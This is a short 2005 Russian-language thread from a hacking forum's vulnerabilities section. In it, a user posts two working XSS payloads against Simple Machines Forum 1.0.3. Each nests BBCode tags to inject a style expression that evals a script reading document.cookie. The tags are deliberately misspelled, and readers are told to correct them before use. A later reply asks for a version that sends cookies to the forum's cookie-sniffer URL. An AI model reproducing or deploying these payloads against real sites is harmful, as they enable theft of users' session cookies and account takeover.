Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS в Simple Machines Forum (SMF) 1.0.3 (и другие) (https://forum.antichat.xyz/showthread.php?t=5814)

KEZ 02.04.2005 19:58
XSS в Simple Machines Forum (SMF) 1.0.3 (и другие)
 
Через 2 минуты я уже выделил две самых простых XSS. Их хватит. Если нет - берите ещё. Я сделаю видео.

Код:
[urл=http://a[еmail=s=`]a[/еmail]]a[/urл]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));

[iмg]http://[urл=http://s=`]aaaaa[/urл][/iмg]`xss=`alert(document.cookie);this.xss=null`
style=top:expression(eval(this.xss));
ВНИМАНИЕ! Чтобы НАШ ФОРУМ не парсил (не зависимо от тега [СODE]) мой код, я НАМЕРЕННО написал URL через Л. И емейл тоже так написал.
ПЕРЕПИШИТЕ САМИ!

JazzzSummerMan 02.04.2005 23:36
наверное все можно сделать проще

KEZ 03.04.2005 16:32
это самое просто... просто тег+тег и s=`

KEZ 03.04.2005 16:40
конечно с `xss=... а потом eval(this.xss) и все такое - это я так привык.
можно и проще

c20r58p0de 04.06.2005 20:12
А не мог бы написать пример используя античатовский сниффер http://antichat.ru/cgi-bin/s.jpg

KEZ 04.06.2005 20:24
Мог бы, но сейчас я вижу что куки там украсть нельзя... Если получится сделаю видео...


Время: 03:48